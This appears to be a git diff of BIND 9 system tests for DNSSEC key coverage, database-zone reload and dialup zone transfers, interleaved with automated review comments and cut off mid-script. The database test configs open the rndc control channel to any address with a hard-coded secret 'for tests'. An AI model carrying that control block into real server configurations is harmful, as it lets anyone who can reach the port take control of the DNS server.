+++ b/bin/tests/system/coverage/07-ksk-ttl/README
@@ -0,0 +1,4 @@
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
+
+Expected tool output TBD.
diff --git a/bin/tests/system/coverage/07-ksk-ttl/expect b/bin/tests/system/coverage/07-ksk-ttl/expect
new file mode 100644
index 0000000..eade21a
--- /dev/null
+++ b/bin/tests/system/coverage/07-ksk-ttl/expect
@@ -0,0 +1,9 @@
+args="-d 1w -m 2w"
+warn=1
+error=0
+ok=2
+retcode=0
+match="WARNING: Key .* (KSK) is activated too soon
+after publication
+Activation should be at least 7 days after
+publication."
diff --git a/bin/tests/system/coverage/08-zsk-ttl/README b/bin/tests/system/coverage/08-zsk-ttl/README
new file mode 100644
index 0000000..2659099
--- /dev/null
+++ b/bin/tests/system/coverage/08-zsk-ttl/README
@@ -0,0 +1,4 @@
+This set includes a KSK rollover, with insufficient delay between
+prepublication and rollover.
+
+Expected tool output TBD.
diff --git a/bin/tests/system/coverage/08-zsk-ttl/expect b/bin/tests/system/coverage/08-zsk-ttl/expect
new file mode 100644
index 0000000..150c9cd
--- /dev/null
+++ b/bin/tests/system/coverage/08-zsk-ttl/expect
@@ -0,0 +1,9 @@
+args="-d 1w -m 2w"
+warn=1
+error=0
+ok=2
+retcode=0
+match="WARNING: Key .* (ZSK) is activated too soon
+after publication
+Activation should be at least 7 days after
+publication."
diff --git a/bin/tests/system/coverage/09-check-zsk/README b/bin/tests/system/coverage/09-check-zsk/README
new file mode 100644
index 0000000..bc5edc8
--- /dev/null
+++ b/bin/tests/system/coverage/09-check-zsk/README
@@ -0,0 +1,6 @@
+This set includes one KSK rollover. The KSK is deactivated prior to
+its replacement being activated; however, as we are only checking ZSK's,
+we should not detect the error. Tool output should resemble:
+
+Checking ZSK events for zone example.com, algorithm 7:
+OK
diff --git a/bin/tests/system/coverage/09-check-zsk/expect b/bin/tests/system/coverage/09-check-zsk/expect
new file mode 100644
index 0000000..d56c4bf
--- /dev/null
+++ b/bin/tests/system/coverage/09-check-zsk/expect
@@ -0,0 +1,6 @@
+args="-z -d 1h -m 2h"
+warn=0
+error=0
+ok=1
+retcode=0
+match=""
diff --git a/bin/tests/system/coverage/10-check-ksk/README b/bin/tests/system/coverage/10-check-ksk/README
new file mode 100644
index 0000000..948364d
--- /dev/null
+++ b/bin/tests/system/coverage/10-check-ksk/README
@@ -0,0 +1,7 @@ +This set includes one ZSK rollover. The first ZSK is deactivated +prior to its replacement being activated; however, as we are only +checking KSKs, we should not detect the error. Tool output should +resemble: + +Checking KSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/10-check-ksk/expect b/bin/tests/system/coverage/10-check-ksk/expect new file mode 100644 index 0000000..a03d2aa --- /dev/null +++ b/bin/tests/system/coverage/10-check-ksk/expect @@ -0,0 +1,6 @@ +args="-k -d 1h -m 2h" +warn=0 +error=0 +ok=1 +retcode=0 +match="" diff --git a/bin/tests/system/coverage/11-cutoff/README b/bin/tests/system/coverage/11-cutoff/README new file mode 100644 index 0000000..8102593 --- /dev/null +++ b/bin/tests/system/coverage/11-cutoff/README @@ -0,0 +1,10 @@ +This set includes one KSK rollover. The KSK is deactivated prior to +its replacement being activated. Tool output should resemble: + +Checking KSK events for zone example.com, algorithm 7: +ERROR: After 2012-31-Jul (20:59:14): + Inactive: example.com/007/45435 (KSK) +No KSK's are active + +Checking ZSK events for zone example.com, algorithm 7: +OK diff --git a/bin/tests/system/coverage/11-cutoff/expect b/bin/tests/system/coverage/11-cutoff/expect new file mode 100644 index 0000000..bdf29d0 --- /dev/null +++ b/bin/tests/system/coverage/11-cutoff/expect @@ -0,0 +1,6 @@ +args="-l 1y -d 1h -m 2h" +warn=0 +error=0 +ok=2 +retcode=0 +match="" diff --git a/bin/tests/system/coverage/12-ksk-deletion/expect b/bin/tests/system/coverage/12-ksk-deletion/expect new file mode 100644 index 0000000..898c0bf --- /dev/null +++ b/bin/tests/system/coverage/12-ksk-deletion/expect @@ -0,0 +1,6 @@ +args= +warn=4 +error=1 +ok=1 +retcode=1 +match=0 diff --git a/bin/tests/system/coverage/13-dotted-dotless/expect b/bin/tests/system/coverage/13-dotted-dotless/expect new file mode 100644 index 0000000..5760d29 --- /dev/null +++ b/bin/tests/system/coverage/13-dotted-dotless/expect 
@@ -0,0 +1,7 @@ +args="-z -m2h" +warn=0 +error=0 +ok=2 +retcode=0 +match= +zones="one.example. two.example" diff --git a/bin/tests/system/coverage/clean.sh b/bin/tests/system/coverage/clean.sh new file mode 100644 index 0000000..5527946 --- /dev/null +++ b/bin/tests/system/coverage/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f named-compilezone +rm -f */K*.key +rm -f */K*.private +rm -rf coverage.* +rm -rf dotted-dotless +rm -f ns*/named.lock diff --git a/bin/tests/system/coverage/setup.sh b/bin/tests/system/coverage/setup.sh new file mode 100644 index 0000000..7de73b8 --- /dev/null +++ b/bin/tests/system/coverage/setup.sh 
@@ -0,0 +1,119 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +ln -s $CHECKZONE named-compilezone + +# Test 1: KSK goes inactive before successor is active +dir=01-ksk-inactive +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +$SETTIME -K $dir -I +7mo $ksk1 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 2: ZSK goes inactive before successor is active +dir=02-zsk-inactive +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -I +7mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 3: KSK is unpublished before its successor is published +dir=03-ksk-unpublished +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +$SETTIME -K $dir -D +6mo $ksk1 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 4: ZSK is unpublished before its successor is published +dir=04-zsk-unpublished +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -D +6mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk 
example.com) + +# Test 5: KSK deleted and successor published before KSK is deactivated +# and successor activated. +dir=05-ksk-unpub-active +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +8mo $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 6: ZSK deleted and successor published before ZSK is deactivated +# and successor activated. +dir=06-zsk-unpub-active +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +8mo $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 7: KSK rolled with insufficient delay after prepublication. +dir=07-ksk-ttl +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +# allow only 1 day between publication and activation +$SETTIME -K $dir -P +269d $ksk2 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 8: ZSK rolled with insufficient delay after prepublication. 
+dir=08-zsk-ttl +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +# allow only 1 day between publication and activation +$SETTIME -K $dir -P +269d $zsk2 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 9: KSK goes inactive before successor is active, but checking ZSKs +dir=09-check-zsk +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=$($KEYGEN -q -K $dir -S $ksk1) +$SETTIME -K $dir -I +7mo $ksk1 > /dev/null 2>&1 +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) + +# Test 10: ZSK goes inactive before successor is active, but checking KSKs +dir=10-check-ksk +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -I +7mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 11: ZSK goes inactive before successor is active, but after cutoff +dir=11-cutoff +zsk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com) +$SETTIME -K $dir -I +18mo -D +2y $zsk1 > /dev/null 2>&1 +zsk2=$($KEYGEN -q -K $dir -S $zsk1) +$SETTIME -K $dir -I +16mo $zsk1 > /dev/null 2>&1 +ksk1=$($KEYGEN -q -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com) + +# Test 12: Too early KSK deletion +dir=12-ksk-deletion +ksk1=$($KEYGEN -q -K $dir -f KSK -a 8 -b 2048 -I +40d -D +40d example.com) +ksk2=$($KEYGEN -q -K $dir -S $ksk1.key example.com) + +# Test 13: check names with/without dots at the end +dir=13-dotted-dotless +zsk1=$($KEYGEN -q -K $dir -a rsasha256 one.example) +zsk2=$($KEYGEN -q -K $dir -a rsasha256 two.example) diff --git a/bin/tests/system/coverage/tests.sh b/bin/tests/system/coverage/tests.sh new file mode 100644 index 0000000..e0da919 --- /dev/null 
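Review bot: Every `$SETTIME` call in this script sends both output streams to /dev/null and ignores the exit status, and none of the `$KEYGEN` substitutions is checked for an empty result, so a failed key operation leaves a fixture directory that no longer represents the case named in its comment. The failure would then surface only later as a count mismatch in tests.sh, with nothing pointing back to this script. Consider keeping stderr visible and failing fast, for example `$SETTIME -K $dir -I +7mo $ksk1 > /dev/null || exit 1`. Tests 12 and 13 also pin the algorithm (`-a 8 -b 2048`, `-a rsasha256`) while tests 1–11 use `${DEFAULT_ALGORITHM}`; a one-line comment saying why would help the next reader.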
+++ b/bin/tests/system/coverage/tests.sh 
@@ -0,0 +1,87 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +COVERAGE="$COVERAGE -c ./named-compilezone" + +status=0 +n=1 + +matchall () { + file=$1 + echo "$2" | while read matchline; do + grep "$matchline" $file > /dev/null 2>&1 || { + echo "FAIL" + return + } + done +} + +echo_i "checking for DNSSEC key coverage issues" +ret=0 +for dir in [0-9][0-9]-*; do + ret=0 + echo_i "$dir" + args= warn= error= ok= retcode= match= zones= + . $dir/expect + $COVERAGE $args -K $dir ${zones:-example.com} > coverage.$n 2>&1 + + # check that return code matches expectations + found=$? 
+ if [ $found -ne $retcode ]; then + echo "retcode was $found expected $retcode" + ret=1 + fi + + # check for correct number of errors + found=`grep ERROR coverage.$n | wc -l` + if [ $found -ne $error ]; then + echo "error count was $found expected $error" + ret=1 + fi + + # check for correct number of warnings + found=`grep WARNING coverage.$n | wc -l` + if [ $found -ne $warn ]; then + echo "warning count was $found expected $warn" + ret=1 + fi + + # check for correct number of OKs + found=`grep "No errors found" coverage.$n | wc -l` + if [ $found -ne $ok ]; then + echo "good count was $found expected $ok" + ret=1 + fi + + found=`matchall coverage.$n "$match"` + if [ "$found" = "FAIL" ]; then + echo "no match on '$match'" + ret=1 + fi + + found=`grep Traceback coverage.$n | wc -l` + if [ $found -ne 0 ]; then + echo "python exception detected" + ret=1 + fi + + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/database/clean.sh b/bin/tests/system/database/clean.sh new file mode 100644 index 0000000..f86404c --- /dev/null +++ b/bin/tests/system/database/clean.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/named.conf ns1/named.run ns1/named.memstats +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/database/ns1/named1.conf.in b/bin/tests/system/database/ns1/named1.conf.in new file mode 100644 index 0000000..56c6a07 --- /dev/null 
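Review bot: The numeric comparisons in the loop (`[ $found -ne $retcode ]`, and the same for `$error`, `$warn` and `$ok`) use unquoted values that are reset to empty just before `. $dir/expect`, so an expect file that omits a field makes `[` fail with a usage error, the `if` takes the false branch, and that check is silently skipped. A guard right after sourcing the file would turn this into a hard failure: `: "${warn:?}" "${error:?}" "${ok:?}" "${retcode:?}"`. In `matchall`, `read matchline` without `-r` strips backslashes from the patterns held in `match`; `read -r matchline` passes them to grep as written.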
+++ b/bin/tests/system/database/ns1/named1.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "database" { + type primary; + database "_builtin empty localhost. hostmaster.isc.org."; +}; diff --git a/bin/tests/system/database/ns1/named2.conf.in b/bin/tests/system/database/ns1/named2.conf.in new file mode 100644 index 0000000..7eb4930 --- /dev/null +++ b/bin/tests/system/database/ns1/named2.conf.in 
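Review bot: The `controls` block accepts rndc connections from `allow { any; }` and authenticates them with a fixed secret that is published in the repository (`secret "1234abcd8765";`), so anything that can reach 10.53.0.1 on the control port can drive this server; named2.conf.in repeats the same block. That is presumably acceptable because 10.53.0.1 is a test-only address, but nothing in the file says so. I would add a comment above the key, `// Test-only key: never reuse outside the system-test network.`, and, if the rndc client always connects from the test range, narrow the ACL to it, e.g. `allow { 10.53.0.0/24; }`.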
@@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "database" { + type primary; + database "_builtin empty localhost. marka.isc.org."; +}; diff --git a/bin/tests/system/database/setup.sh b/bin/tests/system/database/setup.sh new file mode 100644 index 0000000..b40e103 --- /dev/null +++ b/bin/tests/system/database/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named1.conf.in ns1/named.conf diff --git a/bin/tests/system/database/tests.sh b/bin/tests/system/database/tests.sh new file mode 100644 index 0000000..b919c2f --- /dev/null +++ b/bin/tests/system/database/tests.sh 
@@ -0,0 +1,55 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" +RNDCCMD="$RNDC -s 10.53.0.1 -p ${CONTROLPORT} -c ../common/rndc.conf" + +# Check the example. domain + +echo_i "checking pre reload zone ($n)" +ret=0 +$DIG $DIGOPTS soa database. @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "hostmaster\.isc\.org" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +copy_setports ns1/named2.conf.in ns1/named.conf +$RNDCCMD reload 2>&1 >/dev/null + +echo_i "checking post reload zone ($n)" +ret=1 +try=0 +while test $try -lt 6 +do + sleep 1 + ret=0 + $DIG $DIGOPTS soa database. @10.53.0.1 > dig.out.ns1.test$n || ret=1 + grep "marka\.isc\.org" dig.out.ns1.test$n > /dev/null || ret=1 + try=`expr $try + 1` + test $ret -eq 0 && break +done +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dialup/clean.sh b/bin/tests/system/dialup/clean.sh new file mode 100644 index 0000000..9318255 --- /dev/null +++ b/bin/tests/system/dialup/clean.sh 
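Review bot: `$RNDCCMD reload 2>&1 >/dev/null` discards stdout but leaves stderr on the script's output, and its exit status is never examined, so a rejected or failed reload is noticed only when the six-attempt polling loop times out. If both streams are meant to be silenced the order should be `>/dev/null 2>&1`; either way, logging the failure makes the cause visible: `$RNDCCMD reload > /dev/null 2>&1 || echo_i "rndc reload failed"`. The comment `# Check the example. domain` also does not match the zone actually queried, which is `database.`.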
@@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns2/example.bk +rm -f ns3/example.bk +rm -f */named.memstats */named.run +rm -f ns*/named.conf +rm -f ns*/named.lock diff --git a/bin/tests/system/dialup/ns1/example.db b/bin/tests/system/dialup/ns1/example.db new file mode 100644 index 0000000..3ce33f9 --- /dev/null +++ b/bin/tests/system/dialup/ns1/example.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA hostmaster.ns1 ns1 ( + 1 3600 1200 3600000 1200 ) + NS ns1.example. + NS ns2.example. + NS ns3.example. +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/dialup/ns1/named.conf.in b/bin/tests/system/dialup/ns1/named.conf.in new file mode 100644 index 0000000..8ed56a8 --- /dev/null +++ b/bin/tests/system/dialup/ns1/named.conf.in 
@@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; + dnssec-validation no; +}; + +zone "." { + type master; + file "root.db"; +}; + +zone "example." { + type master; + notify explicit; + also-notify { 10.53.0.2; }; + dialup yes; + file "example.db"; +}; diff --git a/bin/tests/system/dialup/ns1/root.db b/bin/tests/system/dialup/ns1/root.db new file mode 100644 index 0000000..882da96 --- /dev/null +++ b/bin/tests/system/dialup/ns1/root.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA hostmaster.ns1.example ns1.example ( + 1 3600 1200 3600000 1200 ) + NS ns1.example +example NS ns1.example + NS ns2.example + NS ns3.example +ns1.example A 10.53.0.1 +ns2.example A 10.53.0.2 +ns3.example A 10.53.0.3 diff --git a/bin/tests/system/dialup/ns2/hint.db b/bin/tests/system/dialup/ns2/hint.db new file mode 100644 index 0000000..0198f25 --- /dev/null +++ b/bin/tests/system/dialup/ns2/hint.db 
@@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 1200 NS ns1.example +ns1.example A 10.53.0.1 diff --git a/bin/tests/system/dialup/ns2/named.conf.in b/bin/tests/system/dialup/ns2/named.conf.in new file mode 100644 index 0000000..a30bb0d --- /dev/null +++ b/bin/tests/system/dialup/ns2/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "hint.db"; +}; + +zone "example." { + type slave; + dialup passive; + notify no; + file "example.bk"; + masters { 10.53.0.1; }; +}; diff --git a/bin/tests/system/dialup/ns3/hint.db b/bin/tests/system/dialup/ns3/hint.db new file mode 100644 index 0000000..0198f25 --- /dev/null +++ b/bin/tests/system/dialup/ns3/hint.db 
@@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 1200 NS ns1.example +ns1.example A 10.53.0.1 diff --git a/bin/tests/system/dialup/ns3/named.conf.in b/bin/tests/system/dialup/ns3/named.conf.in new file mode 100644 index 0000000..df6514d --- /dev/null +++ b/bin/tests/system/dialup/ns3/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + heartbeat-interval 2; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "hint.db"; +}; + +zone "example." { + type slave; + dialup refresh; + notify no; + file "example.bk"; + masters { 10.53.0.2; }; +}; diff --git a/bin/tests/system/dialup/setup.sh b/bin/tests/system/dialup/setup.sh new file mode 100644 index 0000000..dad3589 --- /dev/null +++ b/bin/tests/system/dialup/setup.sh 
@@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf diff --git a/bin/tests/system/dialup/tests.sh b/bin/tests/system/dialup/tests.sh new file mode 100644 index 0000000..1353569 --- /dev/null +++ b/bin/tests/system/dialup/tests.sh 
@@ -0,0 +1,65 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +rm -f dig.out.* + +DIGOPTS="+norec +tcp +noadd +nosea +nostat +noquest +nocmd -p ${PORT}" + +# Check the example. domain + +$DIG $DIGOPTS example. @10.53.0.1 soa > dig.out.ns1.test || ret=1 +echo_i "checking that first zone transfer worked" +ret=0 +try=0 +while test $try -lt 120 +do + $DIG $DIGOPTS example. @10.53.0.2 soa > dig.out.ns2.test || ret=1 + if grep SERVFAIL dig.out.ns2.test > /dev/null + then + try=`expr $try + 1` + sleep 1 + else + digcomp dig.out.ns1.test dig.out.ns2.test || ret=1 + break; + fi +done +echo_i "try $try" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that second zone transfer worked" +ret=0 +try=0 +while test $try -lt 120 